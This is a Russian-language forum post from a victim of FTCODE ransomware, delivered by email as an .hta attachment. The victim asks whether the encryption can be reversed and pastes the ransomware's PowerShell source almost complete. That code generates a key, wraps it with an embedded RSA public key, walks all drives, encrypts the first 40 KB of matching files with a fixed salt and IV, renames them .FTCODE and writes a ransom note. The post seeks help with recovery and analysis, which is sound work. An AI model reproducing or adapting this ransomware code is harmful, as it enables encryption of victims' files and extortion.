[-]

Преамбула:
На машину проник злобный "вирус", шифрующий большую часть файлов и приписывающий им расширение .FTCODE . Сам по себе он представляет пришедшее по почте благодарственное письмо.hta, внутри представляет собой хта-шный скрипт, тянущий за собой powershell'ный.

Амбула:
Он вроде как рекурсивно обходит дерево каталогов и шифрует по rsa1024 с фиксированной солью первые 40Кб каждого файла, попадающего под маску, после чего лепит цидулю о том, как всё плохо и кому слать деньги.

Может ли кто-нибудь прокоментировать, как конкретно он шифрует и можно ли обратить эффект? У меня уже моск пухнет..
Пару текстовых строк подсократил, они в звёздочках. Возможно, пока парсил для читабельности, снёс какую-то фигурную скобку. Особо въедливым могу выслать рабочую копию =)

Открыт призовой фонд

$ErrorActionPreference="SilentlyContinue"; if((Get-Process -Name powershell).count -ge 2){exit} $ref=[Reflection.Assembly]:LoadWithPartialName('System.Security'); Add-Type -Assembly System.Web; $idpath = $env:APPDATA + "\" + (gwmi win32_computersystem).model; if(Test-Path $idpath){$getc = Get-Content $idpath;if ($getc -eq "good"){exit} else {$ek = $getc}} $ek=[Web.Security.Membership]:GeneratePassword(50, 4); Set-Content -Path $idpath -Value $ek; [byte[]]$bytes=[system.Text.Encoding]:Unicode.GetBytes($ek); $basekey="BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg=="; $rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider; $rsa.ImportCspBlob([system.Convert]:FromBase64String($basekey)); $enckey=[system.Convert]:ToBase64String($rsa.Encrypt($bytes, $false)); $text= " *тут нас пугают* " + $enckey; function Encrypt-File($item, $Passphrase) { $salt="BMCODE hack your system"; $init="BMCODE INIT"; $r = new-Object System.Security.Cryptography.RijndaelManaged; $pass = [Text.Encoding]:UTF8.GetBytes($Passphrase); $salt = [Text.Encoding]:UTF8.GetBytes($salt); $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32); $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]:UTF8.GetBytes($init) )[0..15]; $r.Padding="Zeros"; $r.Mode="CBC"; $c = $r.CreateEncryptor(); $ms = new-Object IO.MemoryStream; $cs = new-Object Security.Cryptography.CryptoStream $ms,$c,"Write";$Hiof="Hiof"; $cs.Write($item, 0,$item.Length); $cs.Close(); $ms.Close(); $r.Clear(); return $ms.ToArray(); } $disks=Get-PSDrive|Where-Object {$_.Free -gt 50000}|Sort-Object -Descending; foreach($disk in $disks){gci $disk.root -Recurse -Include "*.doc",*тут был список расширений*,"*.1cd" | %{try {$file=[io.file]:Open($_, 'Open', 'ReadWrite'); if ($file.Length -lt "40960"){$size=$file.Length}else{$size="40960"}[byte[]]$buff = new-object byte[] $size; $ToEncrypt = $file.Read($buff, 0, $buff.Length); $file.Position='0'; $Encrypted=Encrypt-File $buff $ek; $file.Write($Encrypted, 0, $Encrypted.Length); $file.Close(); $newname=$_.Name+'.FTCODE'; ren -Path $_.FullName -NewName $newname -Force; $path=$_.DirectoryName+'\READ_ME_NOW.TXT'; if(!(Test-Path $path)){sc -pat $path -va $text}}catch{}}}Set-Content -Path $idpath -Value "good"